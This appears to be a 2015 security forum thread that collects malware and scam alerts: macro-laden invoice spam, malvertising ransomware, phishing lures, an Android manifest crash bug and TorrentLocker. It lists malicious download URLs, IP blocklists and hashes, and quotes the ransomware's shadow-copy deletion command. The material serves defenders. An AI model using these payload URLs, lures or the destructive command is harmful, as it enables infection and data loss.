... these domains see to have a very short life. I identified nearly 3000 domains using these nameservers, the following of which are flagged as malicious by Google... Recommended minimum blocklist (Choopa LLC IPs are highlighted):
108.61.123.219
108.61.165.69
108.61.165.70
108.61.165.96
108.61.167.160
108.61.172.139
108.61.172.145
108.61.175.125
108.61.177.107
108.61.177.89
108.61.198.148
108.61.211.121
64.187.225.245
104.224.147.220
UPDATE: Choopa LLC say they have terminated those IPs**. However, it may still be worth reviewing your logs for traffic to these servers as they might identify machines that have been compromised."
* http://urlquery.net/report.php?id=1420560803160
** https://2.bp.blogspot.com/-6jzwvTDMi9U/VK1T26Lei_I/AAAAAAAAGFs/H6-oPE7HwA8/s1600/choopa.png
___
Huffington Post and Gamezone vistors targeted with malvertising, infected with ransomware
- http://net-security.org/malware_news.php?id=2936
Jan 7, 2015 - "The last days of the past and the first days of the current year have been unlucky for visitors of several popular sites including the Huffington Post and Gamezone .com, which were unknowingly serving malicious ads that ultimately led to a ransomware infection. Cyphort Lab researchers first spotted the malvertising campaign on New Year's Eve on the HuffPo's Canadian website. A few days later, the ads were served on HuffingtonPost .com. The ensuing investigation revealed that the source of the ads is advertising .com, an AOL ad-network. Visitors to the sites who were served the ads were automatically redirected to a landing page hosting either the Neutrino or the Sweet Orange exploit kit. The kits served several exploits, and if one of them was successful, a new variant of the Kovter ransowmare was downloaded and executed. Kovter* blocks the targeted computer's keyboard and mouse, usually demands a ransom of around $300, and searches the web browser's history for URLs of adult content sites to include in the ransom note. AOL has been notified of the problem, and has removed the malicious ads from rotation both in their advertising.com ad-network as well as in their adtech .de one... This is not the first time that Kovter was delivered in this way. Another malvertising campaign targeting YouTube users** was spotted in October 2014."
* http://www.net-security.org/malware_news.php?id=2450
** http://www.net-security.org/malware_news.php?id=2883
Sweet Orange exploit kit/NeutrinoEK: http://blog.trendmicro.com/trendlabs-security-intelligence/youtube-ads-lead-to-exploit-kits-hit-us-victims/
>> http://www.cyphort.com/huffingtonpost-serving-malware/
___
Fake 'Accounts Payable - Remittance Advice' SPAM - doc malware
- http://myonlinesecurity.co.uk/senior-accounts-payable-specialist-remittance-advice-word-doc-malware/
7 Jan 2015 - "'Remittance Advice for 945.66 GBP' (random amounts) pretending to come from a random named Senior Accounts Payable Specialist at a random company with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Update: we are also seeing a slightly different version with the subject Invoice 2907.51 GBP (random amounts) with an Excel XLS attachment... The email looks like:
Please find attached a remittance advice for recent BACS payment of 945.66 GBP.
Any queries please contact us.
Katie Carr
Senior Accounts Payable Specialist
BUSHVELD MINERALS LTD
7 January 2015 : REM_5160JW.doc - Current Virus total detections: 4/56*
... [1]connects to 193.136.19.160 :8080//mans/pops.php and downloads the usual dridex to %temp%\1V2MUY2XWYSFXQ.exe Current VirusTotal definitions 4/56**
RBAC_2856PJ.xls Current Virus total detections: 3/56***
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9bb9d75b19588ae6d5099e6f9f69485410a39da3e3c69d02db2756ad527d4e0b/analysis/1420634098/
** https://www.virustotal.com/en/file/f96c2e9c17fe8a9a93251c93ed477d0715f8a06b465420c2ffa2e713ca7b8256/analysis/1420635840/
... Behavioural information:
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/
*** https://www.virustotal.com/en/file/f50ca59a7e263a9b8f6b3432d380aebca85dfe041872812c81aafa26bf3b3973/analysis/1420636228/
1] 193.136.19.160: https://www.virustotal.com/en/ip-address/193.136.19.160/information/
___
Fake 'NUCSOFT-Payroll' SPAM - doc malware
- http://myonlinesecurity.co.uk/eliza-fernandes-nucsoft-payroll-december-2014-word-doc-malware/
7 Jan 2015 - "'NUCSOFT-Payroll December 2014' pretending to come from Eliza Fernandes <eliza_fernandes@ nucsoft .co.in> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... DO NOT follow the advice they give to enable macros to see the content... The email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/NUCSOFT-Payroll-December-2014.jpg
7 January 2015 : Payroll Dec’14.doc . Current Virus total detections: 2/56*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7705658817366db2e7e82a39207e510a89678d3b06e02a1ec6685bb05231b011/analysis/1420619222/
- http://blog.dynamoo.com/2015/01/malware-spam-eliza-fernandes-nucsoft.html
7 Jan 2015
> https://www.virustotal.com/en/file/7705658817366db2e7e82a39207e510a89678d3b06e02a1ec6685bb05231b011/analysis/1420623113/
>> https://www.virustotal.com/en/file/4d3bb0cfba9f6090e2704fe003e373002f906df0d59c68e73ff0d8a20cd36884/analysis/1420624521/
Recommended blocklist:
59.148.196.153: https://www.virustotal.com/en/ip-address/59.148.196.153/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___
Malformed AndroidManifest.xml in Apps Can Crash Mobile Devices
- http://blog.trendmicro.com/trendlabs-security-intelligence/malformed-androidmanifest-xml-in-apps-can-crash-mobile-devices/
Jan 7, 2015 - "Every Android app comprises of several components, including something called the AndroidManifest.xml file or the manifest file. This manifest file contains essential information for apps, “information the system must have before it can run any of the app’s code.” We came across a vulnerability related to the manifest file that may cause an affected device to experience a -continuous- cycle of rebooting — rendering the device nearly useless to the user. The Manifest File Vulnerability: The vulnerability can cause the OS to crash through two different ways. The first involves very long strings and memory allocation. Some apps may contain huge strings in their .XML files, using document type definition (DTD) technology. When this string reference is assigned to some of the tags in AndroidManifest.xml (e.g., permission name, label, name of activity), the Package Parser will require memory to parse this .XML file. However, when it requires more memory than is available, the PackageParser will crash. This triggers a chain reaction wherein all the running services stops and the whole system consequently reboots once. The second way involves .APK files and a specific intent-filter, which declares what a service or activity can do. An icon will be created in the launcher if the manifest file contains an activity definition with this specific intent-filter:
<intent-filter>
<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>
</intent-filter>
If there are many activities defined with this intent-filter, the same number of icons will be created in the home page after installation. However, if this number is too large, the .APK file will trigger a loop of rebooting. If the number of activities is bigger than 10,000:
For Android OS version 4.4, the launcher process will undergo the reboot.
For version L, the PackageParser crashes and reboots. The malformed .APK will be installed by no icon will be displayed. If the number of activities is larger than 100,000, the devices will undergo the -loop- of rebooting...
We have tested and proven that this created APK could -crash- both Android OS 4.4.4, Android OS L, -and- older versions of the platform... While this vulnerability isn’t a technically a security risk, it does put devices at risk in terms of functionality. This vulnerability can essentially leave devices useless. Affected devices can be “rescued” but -only- if the Android Debug Bridge (ADB) is activated or enabled. The only solution would be to connect the device to a computer, boot the phone in fastboot mode, and flash the ROM. Unfortunately, such actions can only be done by highly technical users as a mistake can possibly brick a device. For this issue, we recommend that users contact customer service (if their devices are still under warranty) or a reputable repair shop. We have notified Google about this issue."
___
Fake Flight QZ8501 Video on Facebook
- https://blog.malwarebytes.org/fraud-scam/2015/01/dont-share-this-fake-flight-qz8501-video-on-facebook/
Jan 6, 2015 - "... If you’re waiting on information with regards what caused the tragic crash of AirAsia Flight QZ8501, please be aware that the inevitable fake Facebook video links are now putting in an appearance. Here’s one, located at: bergkids(dot)com/qz8501 - The page is pretty bare, save for the imagery of what they claim is the plane in question and the following text:
[CRASH VIDEO] AirAsia Flight QZ8501 Crashed near east coast of Sumatera.
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz1.jpg
Clicking the play button encourages Facebook users to share it, before being redirected to an -imitation- YouTube page located at: urvashi(dot)altervista(dot)org/video/vid(dot)php
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz2.jpg
While visitors might think this would be the video in question, in actual fact they’re looking at a sort of -fake- video -farm- where clicking the link takes them to a wide variety of phony clip scams... From there, they’re then (re)directed to one of the links in the screenshot above. There’s everything from “You won’t eat [product x] again after seeing this” to non-existent leaked celebrity tapes. Disturbingly, two of the pages claim to show car accidents and one of them uses a rather graphic photograph. Given that people could be arriving there from a personal need to find out more information about the plane crash, this is just more proof that the people behind these pages couldn’t care less... All of the above pages return the visitor to the “main” Altervista URL, where they’ll be asked to share then be sent to another of the links in the -redirect- code. It seems to be a way of trying to drop the links on as many feeds as possible (assuming the Facebook account owner changes the share option from “just me” to people in their social circles). Should the weary clicker grow tired of this digital roundabout and simply sit on the altervista page too long, they’ll find that they’re automatically sent to a page called “Horrific Video”:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz5.jpg
Unlike the other pages which simply loop potential victims around while asking them to share links, this one will take them to a -survey- page if the video “player” is clicked... As with all other survey pages, the links could lead to everything from offers and personal questions to ringtone signups or software installs and are usually served up according to region... If you want to know the latest information on the AirAsia crash, please stick to news sources you know and trust. It’s extremely unlikely someone is going to have exclusive footage sitting on some video website you’ve near heard of, and the moment you’re caught in a loop of “Share this on Facebook to view” messages you can bet there’s nothing on offer except someone trying to make a fast buck."
:fear::fear: :mad:
AplusWebMaster
2015-01-08, 14:53
FYI...
Fake 'invoice EME018' SPAM – doc malware
- http://myonlinesecurity.co.uk/ieuan-james-invoice-eme018-docx-word-doc-malware/
8 Jan 2015 - "'invoice EME018.docx' pretending to come from Ieuan James <emerysieuan@ gmail .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has come in corrupted on my email server and looks like this (I am sure some email servers will serve up a working version) :
–Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905
Content-Type: text/plain;
charset=us-ascii
Content-Transfer-Encoding: 7bit
–Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905
Content-Type: application/msword;
name=”invoice EME018.doc”;
x-apple-part-url=D103C3C9-1CC9-4BE2-89E7-EB608B41F92A
Content-Disposition: attachment;
filename=”invoice EME018.doc”
Content-Transfer-Encoding: base64 ...
... extracted the malicious word doc from the content.
8 January 2015 : invoice EME018.doc - Current Virus total detections: 1/56*
According to Dynamoo’s blog[1] this EME018.doc malware file will connect to one of these sites http ://ecovoyage.hi2 .ro/js/bin.exe http ://mateusz321.cba .pl/js/bin.exe - This binary is saved as %TEMP%\oHIGUIgifdg.exe and has a VirusTotal detection rate of 10/55** ..."
* https://www.virustotal.com/en/file/66a2de2890ebaf7ca4521f97a44c5f30371aea72dc1023b051fea4ef3da94ece/analysis/1420701971/
** https://www.virustotal.com/en/file/12f6d880b94e16fbc1fca0ba1c97b47373e81e03cffc8d08954db13dea1c0678/analysis/1420708713/
1] http://blog.dynamoo.com/2015/01/malware-spam-ieuan-james-invoice.html
8 Jan 2015 - "... this morning I've seen a handful of these malformed malware spams, claiming to be from a Ieuan James and with a subject of invoice EME018.docx. The body text contains some Base64 encoded data which presumably is meant to be an attachment... Recommended minimum blocklist:
59.148.196.153
74.208.11.204
129.215.249.52
78.140.164.160
37.1.208.21
86.156.238.178
In addition I suggest blocking 3NT Solutions LLP / inferno.name IP ranges on sight. I would very strongly recommend blocking the entire 37.1.208.0/21 range..."
___
Fake 'INVOICE ADVISE' and 'NOVEMBER INVOICE' SPAM - doc/xls malware
- http://blog.dynamoo.com/2015/01/malware-spam-invoice-advise-08012015.html
8 Jan 2015 - "These two -spam- runs have different email messages but the same payload. In both cases, there are multiple -fake- senders:
Sample 1 - INVOICE ADVISE 08/01/2015
From: Mia Holmes
Date: 8 January 2015 at 09:11
Subject: INVOICE ADVISE 08/01/2015
Good morning
Happy New Year
Please could you advise on the November GBP invoice in the attachment for me?
Many thanks
Kind Regards
Mia Holmes
Accountant
SULA IRON & GOLD PLC
Sample 2 - NOVEMBER INVOICE
From: Reed Barrera
Date: 8 January 2015 at 09:16
Subject: NOVEMBER INVOICE
Good morning
Happy New Year
Please could you advise on the November GBP invoice in the attachment for me?
Many thanks
Kind Regards
Reed Barrera
Controller
ASSETCO PLC
Other sender names include:
- Marlin Rodriquez
Accountant
CLONTARF ENERGY PLC
- Olive Pearson
Senior Accountant
ABERDEEN UK TRACKER TRUST PLC
- Andrew Salas
Credit Management
AMTEK AUTO
The attachment is in a Word document (in one sample it was a Word document saved as an XLS file). Example filenames include:
RBAC_9971IV.xls
INV_6495NU.doc
2895SC.doc
There are -four- different malicious files that I have seen so far, all with low detection rates [1] [2] [3] [4] which contain in turn one of these macros... leading to a download from one of the following locations:
http ://188.241.116.63 :8080/mops/pops.php
http ://108.59.252.116 :8080/mops/pops.php
http ://178.77.79.224 :8080/mops/pops.php
http ://192.227.167.32 :8080/mops/pops.php
This file is downloaded as g08.exe which is then copied to %TEMP%\1V2MUY2XWYSFXQ.exe. This file has a detection rate of 3/56*. The VT report shows a POST to 194.146.136.1:8080 (PE "Filipets Igor Victorovych", Ukraine) which is a well-known malware server which I recommend that you block. This IP is confirmed in the Malwr report which also shows a dropped DLL which is the same as found in this spam run and has a detection rate of just 2/56**."
1] https://www.virustotal.com/en/file/e0225133c9a4987fcb29c8e646225496248c16a033a565b70b77f4288071b426/analysis/1420712512/
2] https://www.virustotal.com/en/file/b018c37bd4b27d8fcfc543d05ef5c0f0477551afe4a396584c6f1b83aeacfa92/analysis/1420712527/
3] https://www.virustotal.com/en/file/b1c10f76fc15c3ca6ca89df5335d716241e57951098f7324bbe8c627430a0af6/analysis/1420712717/
4] https://www.virustotal.com/en/file/d75b7a1865bed23978462197e7b5d8f1f25dd7eec8244d29f4710dc22bf6e36e/analysis/1420713398/
* https://www.virustotal.com/en/file/bc93e9bdf92f0a9fb24ccbf053f59d79e31588a956204b4d09efff1091a40c89/analysis/1420713841/
** https://www.virustotal.com/en/file/b56547ec2ee8185f772f1cdf034573883df442e4e9fde458fcf526a97563d53b/analysis/1420714510/
- http://myonlinesecurity.co.uk/november-invoice-word-doc-excel-xls-malware/
8 Jan 2015: INV_7330KQ.doc - Current Virus total detections: 1/56*
* https://www.virustotal.com/en/file/bc93e9bdf92f0a9fb24ccbf053f59d79e31588a956204b4d09efff1091a40c89/analysis/1420713841/
... Behavioural information
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/
:fear: :mad:
AplusWebMaster
2015-01-09, 15:16
FYI...
Fake 'Monthly Invoice & Report' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-do-not-reply-datasharp-uk.html
9 Jan 2015 - "This spam email pretends to be from a wholly legitimate company called Datasharp UK Ltd but it isn't, it is a spoof. Datasharp is not sending the spam, their systems have not been compromised in any way.
From: ebilling@ datasharp .co
Date: 9 January 2015 at 06:55
Subject: DO-NOT-REPLY Datasharp UK Ltd - Monthly Invoice & Report
THIS MESSAGE WAS SENT AUTOMATICALLY
Attached is your Invoice from Datasharp Hosted Services for this month.
To view your bill please go to www .datasharp .co.uk. Allow 24 hours before viewing this information.
For any queries relating to this bill, please contact hosted.services@ datasharp .co.uk or call 01872 266644.
Please put your account number on your reply to prevent delays
Kind Regards
Ebilling
So far I have seen two different Word documents attached with low detection rates at VirusTotal [1] [2] containing one of two malicious macros... which then attempt to download an additional component from the following locations:
http ://TICKLESTOOTSIES .COM/js/bin.exe
http ://nubsjackbox.oboroduki .com/js/bin.exe
The tickletootsies .com download location has been cleaned up, but the other one is still working as it downloads a file with a VirusTotal detection rate of 5/56*. That VirusTotal report also shows that it attempts to POST to 74.208.11.204:8080 (1&1, US) which has been a malware C&C server for several weeks and is definitely worth blocking.
UPDATE: the Malwr report shows connections to the following IPs which I recommend you block:
59.148.196.153
74.208.11.204 "
1] https://www.virustotal.com/en/file/1f98eb75e208270fe58e7a95dbab5facd61db611f0b0cbbc6ace61d183d2a64a/analysis/1420794297/
2] https://www.virustotal.com/en/file/e703aef67351b56c9f0d9445382ddeb15af0b852397d310944a1b654fe880d10/analysis/1420794299/
* https://www.virustotal.com/en/file/572ce4b7a105718db6ae70a1d8a28f339fe916061880a116e0d046ec92784e22/analysis/1420793909/
- http://myonlinesecurity.co.uk/not-reply-datasharp-uk-ltd-monthly-invoice-report-word-doc-malware/
9 Jan 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/DO-NOT-REPLY-Datasharp-UK-Ltd-Monthly-Invoice-Report.jpg
* https://www.virustotal.com/en/file/1f98eb75e208270fe58e7a95dbab5facd61db611f0b0cbbc6ace61d183d2a64a/analysis/1420787444/
** https://www.virustotal.com/en/file/e703aef67351b56c9f0d9445382ddeb15af0b852397d310944a1b654fe880d10/analysis/1420787603/
*** https://www.virustotal.com/en/file/572ce4b7a105718db6ae70a1d8a28f339fe916061880a116e0d046ec92784e22/analysis/1420793909/
___
Fake 'Fax' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-employee-documents.html
9 Jan 2015 - "This -fake- fax run is a variation of this one* from yesterday.
From: Fax [no-replay@ fax-voice .com]
Date: 9 January 2015 at 14:52
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: <redacted> ...
As before, there are several links leading to different download locations... These landing pages lead to a pair of jjencoded javascripts hosted on different files. I explained a little about those last time* ... the download location that you coax out of the script is time-limited. If you wait too long, you get a nonsense script instead. And possibly even more interesting is that every time you download the target ZIP file "message.zip ;.zip ;.zip ;" it seems to be different... That led to -10- different ZIP files containing different EXE files... Although those reports indicate some difference in the port numbers, we can see the following URLs being accessed:
http ://202.153.35.133 :55365/0901us1/HOME/0/51-SP3/0/
http ://202.153.35.133 :55365/0901us1/HOME/1/0/0/
http ://crecrec .com/mandoc/nuts12.pdf
http ://202.153.35.133 :55350/0901us1/HOME/41/7/4/
http ://samrhamburg .com/img/ml1.tar
202.153.35.133 (Excell Media Pvt Lt, India) is probably the key thing to block. Despite the differences in the downloader, they all seem to drop a randomly-named file with identical characterstics in each case. This has a VirusTotal detection rate of 1/55** and you can see the Malwr report for that file here***..."
* http://blog.dynamoo.com/2015/01/myfax-no-replaymy-faxcom-spam-campaign.html
** https://www.virustotal.com/en/file/86f0fea9f2cbe4d542f9519120a8df4c20c4ad85539601859c009639d060ce9b/analysis/1420818425/
*** https://malwr.com/analysis/ZjMwNTJiMjEwNDcyNDkxOGEzZTZmZjVjYWE0ZmQwZDU/
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___
Bingham McCutchen Law Firm Spam
- http://threattrack.tumblr.com/post/107594031823/bingham-mccutchen-law-firm-spam
Jan 9, 2015 - "Subjects Seen:
Judicial summons
Typical e-mail details:
Warrant to appear Please be informed that you are expected in the Hamilton County Court of Appeals on February 2nd, 2015 at 9:30 a.m. where the hearing of your case of illegal software use will take place. You may obtain protection of a lawyer, if necessary.
Please bring your identity documents to the Court on the named day. Attendance is compulsory.
The detailed plaint note is attached to this letter, please download and read it thoroughly.
Clerk of court,
Jacob Velez
Malicious URLs:
joalpe.firebearstudio .com/dir.php?bh=oBRzRrtM0A02ooUI1aER2YGsHzIP29bCneRZntfom+A=
Malicious File Name and MD5:
PlaintNote_BinghamMcCutchen_00588315.exe (E1A7061CCB8997EAB296AA84454B072B)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7039d07d7335501cb375a1b4d3632bf5/tumblr_inline_nhwvymzDyH1r6pupn.png
Tagged: law firm, Kuluoz
___
Fake CNN Twitter Feeds SPAM weight loss links
- https://blog.malwarebytes.org/fraud-scam/2015/01/fake-cnn-twitter-feeds-spam-weight-loss-links/
Jan 9, 2014 - "We’ve noticed a number of fake CNN-themed Twitter accounts driving traffic to a couple of different weight loss sites. The accounts in question are:
CNNOnly
TheCNNBreak
MyCNNNews
CNNHotline
All of the above started posting their links in the last few hours... Curiously, they all stopped posting their random mish-mash of memes and joke images around December 18 or 19, so it’s possible they could be formally parked bots which have taken on a new lease of life in some way. We’ve also seen non CNN-themed accounts sending out the same links. To give you an idea of click totals, the stats for two of the links we’ve seen are as follows:
bit(dot)ly/12NTPUP – 25,814 clicks
bit(dot)ly/1zxVKtB – 37,262 clicks
Worth noting that both of those links were created December 10, and as you now have to log into Bit.ly to see additional stats – and I can’t currently login – we can’t comment on what percentage of those clicks are very recent. All the same, we shouldn’t look to keep clicking now and encourage -more- spam as a result. Twitter spam runs are one of those things which will never go away, and it pays to have an idea of the kind of antics* spammers get up to. If you’re looking for some advice on how to keep your Twitter account safe you may wish to look at the latter half of this post** while you’re at it..."
* https://blog.malwarebytes.org/?s=twitter+spam
** https://blog.malwarebytes.org/fraud-scam/2014/01/twitter-spam-rides-again-keeping-your-account-safe/
:fear: :mad: :fear:
AplusWebMaster
2015-01-12, 15:49
FYI...
Fake 'Summary Paid Against' SPAM - doc malware
- http://myonlinesecurity.co.uk/jason-bracegirdle-jps-projects-ltd-summary-paid-word-doc-malware/
12 Jan 2015 - "'Summary Paid Against' pretending to come from Jason Bracegirdle JPS Projects Ltd <jason.bracegirdle@ jpsprojectsltd .co.uk>with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains the same malware payload as today’s Invoice from 'simply carpets of Keynsham Ltd' - Word doc malware* although the file attachment has a different name...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Summary-Paid-Against.jpg
11 January 2015: Copy of Weekly Summary 28 12 2014 w.e 28.12.14.doc - Current Virus total detections: 3/54**
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/invoice-simply-carpets-keynsham-ltd-word-doc-malware/
** https://www.virustotal.com/en/file/10eca59c3d4df784bbb5fb581adf65dbb0c7ec4d95476816cb0f9ce4100b27e3/analysis/1421063953/
- http://blog.dynamoo.com/2015/01/this-fake-finance-email-appears-to-be.html
12 Jan 2015
1] https://www.virustotal.com/en/file/07b3284bc17ea667c8239d402a70005150ab005508234f8f4c6e9b11698287c7/analysis/1421065786/
2] https://www.virustotal.com/en/file/10eca59c3d4df784bbb5fb581adf65dbb0c7ec4d95476816cb0f9ce4100b27e3/analysis/1421065795/
> http://blog.dynamoo.com/2015/01/malware-spam-invoice-from-simply.html
12 Jan 2015
Recommended blocklist:
59.148.196.153
74.208.11.204 "
___
Outlook Settings Spam
- http://threattrack.tumblr.com/post/107897760068/outlook-settings-spam
Jan 12, 2015 - "Subjects Seen:
Important - New Outlook Settings
Typical e-mail details:
Please carefully read the downloaded instructions before updating settings.
campusnut .com/outlook/settings.html
This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk@ Outlook-us.com and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.
Malicious URLs:
campusnut .com/outlook/settings.html
images .californiafamilyfitness.com/outlook/settings.html
data.gamin .cz/outlook/settings.html
capslik .com/outlook/settings.html
duedisnc .it/outlook/settings.html
cwvancouver .com/outlook/settings.html
eu1.panalinks .com/outlook/settings.html
indemnizaciongarantizada .com/outlook/settings.html
dprofessionals .org/outlook/settings.html
homewoodsuitestremblant .com/outlook/settings.html
ig4mbeco .com/outlook/settings.html
bestni .com/outlook/settings.html
boryapim .com/outlook/settings.html
hinchablessegarra .com/outlook/settings.html
bonificachiana .it/outlook/settings.html
Malicious File Name and MD5:
outlook_setting_pdf.exe (9F2018FC3C7DE300D1069460559659F4)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/16f8ee0bb94ce84727dff6d414dd3a33/tumblr_inline_ni2n28AfD81r6pupn.png
Tagged: Outlook, Upatre
- http://blog.dynamoo.com/2015/01/malware-spam-important-new-outlook.html
12 Jan 2015
... outlook_setting_pdf.exe
* https://www.virustotal.com/en/file/e4f76ca8fd1f708736bf5a47703099878e085e7b9b12ca98656428be1de284a5/analysis/1421077347/
"... Recommended blocklist:
202.153.35.133
morph-x .com
coffeeofthemonth .biz "
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___
iPhone 6 SCAM
- https://blog.malwarebytes.org/fraud-scam/2015/01/iphone-6-scam-returns/
Jan 12, 2015 - "... a familiar -scam- on the verge of a come-back:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/brad.png
... we first encountered the spammed link on LinkedIn, thanks to a user named Kolko Kolko, who according to his profile is a coach and has the face of an A-list celebrity. Doing a quick online search using the Goog.gl shortened URL brings up other domains—Google Plus, Livejournal, and Picasa, specifically — where the list is also being posted and shared. Once users click-the-link, they are directed to a survey -scam- page. Below is an example:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/survey.png
The above page is a type of survey that gives users the option to skip. Doing so, however, opens additional layers of survey pages that needs skipping until such a point that users encounter a page they could not escape, such as this:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/more-surveys.png
... the surveys vary depending on the user’s location... Should you encounter any posts from random users on sites you frequent with regard to claiming an iPhone 6, don’t click-the-link... warn friends and contacts on that site to avoid falling for it..."
___
Phish - Barclaycard Credit limit increase
- http://myonlinesecurity.co.uk/barclaycard-credit-limit-increase-phishing/
12 Jan 2015 - "'Credit limit increase' pretending to come from Barclaycard <barclaycard@ mail.barclaycard .co.uk>is one of the latest phish attempts to steal your Bank, credit card and personal details. We are seeing a quite big run of this email today. We see these phishing emails frequently, but today’s spam run of them has a much larger number than usual. This one only wants your personal details, Barclaycard log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Credit-limit-increase-email.jpg
If you open the attached html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/barclaycard-Credit-limit-increase.jpg
When you fill in your user name and password you get a page where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. They then send you on to the genuine Barclaycard website..."
___
Google/Microsoft feud over latest 0-day disclosures
- http://www.infoworld.com/article/2867402/operating-systems/google-zero-day-disclosure-fuels-feud-with-microsoft.html
Jan 12, 2015 - "... The subject is the long-running feud between Google and Microsoft over the handling of zero-day flaws. Google engineer Tavis Ormandy has built quite a reputation in security circles for finding zero days in Windows and notifying Microsoft. If no action is forthcoming from Microsoft in a pre-determined amount of time (usually 90 days), Ormandy releases the details (presumably with Google's permission), typically on the Full Disclosure mailing list... The process is now formally supported by Google, under the name Project Zero*. There's no better way I know to get Microsoft's attention. The latest instances actually concern two zero-day bugs, both reported by a Google researcher known as Forshaw... Here's how the argument boils down, in my estimation. If you trust Microsoft to fix the holes in Windows, then Coordinated Vulnerability Disclosure - where we, as customers, trust Microsoft to dig in and fix problems as soon as they're discovered - is a great idea. We would trust Microsoft to fix the problems expeditiously, because other people may have discovered the problem already. We also trust Microsoft to put enough money into the patching effort to make the fixes appear quickly and accurately. If you don't trust Microsoft, then the question becomes how best to hold Microsoft's feet to the fire. Although some believe in full, immediate disclosure, I don't buy that. There has to be a better way. Google's approach seems to me a reasonable one - although it's arguable that the zero-day notification window should be extended to 120 days..."
* http://googleonlinesecurity.blogspot.fr/2014/07/announcing-project-zero.html
> http://blogs.technet.com/b/msrc/archive/2015/01/11/a-call-for-better-coordinated-vulnerability-disclosure.aspx
___
TorrentLocker -ransomware- hits ANZ Region
- http://blog.trendmicro.com/trendlabs-security-intelligence/torrentlocker-ransomware-hits-anz-region/
Jan 11, 2015 - "... the EMEA (Europe-Middle East-Africa) region experienced a surge in ransomware, specifically, crypto-ransomware attacks. It appears that these attacks are no longer limited to that region. Research from Trend Micro engineers shows that the ANZ (Australia-New Zealand) region is the latest to be greatly affected by this type of malware—this time by TorrentLocker ransomware. The Infection Chain:
Infection diagram for ANZ attacks:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/ANZ-cryp11.jpg
The malware arrives through -emails- that pretend to be penal notices from the New South Wales government (referred in this entry as “NSW”) -or- shipping information from the Australia Post. Once users click-the-link, they will be -redirected- to a -spoofed- page bearing a newly-registered domain similar to the official, legitimate one. The page instructs users to download a file by first entering a CAPTCHA code. If correctly entered, it triggers the download of the malicious file in a zipped format from SendSpace, a file-hosting site. If the user -opens- the zipped file and executes the malware, it will connect to secure command-and-control (C&C) servers. After successful sending and receiving of information, the malware will then encrypt files in the users’ machines using Elliptic Curve Cryptography Encryption and appends the string .encrypted. Afterwards, it drops an .HTML file with decryption instructions and displays a ransom page. It also deletes the shadow copy of the infected system by executing the command line instruction vssadmin.exe Delete Shadows /All /Quiet, thus preventing the user to restore their files from back-up. Based on feedback from the Smart Protection Network, 98.28% of the recipients are from Australia... ... we have identified several fake domains, 180 for Australia Post and 134 for NSW. These domains are hosted in the following Russian name servers, registered to certain email addresses:
91.218.228.XX
193.124.200.13X
193.124.205.18X
193.124.89.10X
The C&C servers in these attacks are newly registered and hosted under IP addresses ranging from 46.161.30.17 to 46.161.30.49. We have also identified eight domains, including adwordshelper[.]ru and countryregion[.]ru... Sample hashes of the files supported by our detections:
4d07581b5bdb3f93ff2721f2125f30e7d2769270
6a46ff02b1a075c967939851e90dfb36329876fa
9d71e27ad25dfe235dfaec99f6241673a6cff30e
a0bbbd2c75e059d54d217c2912b56b1cb447ef31
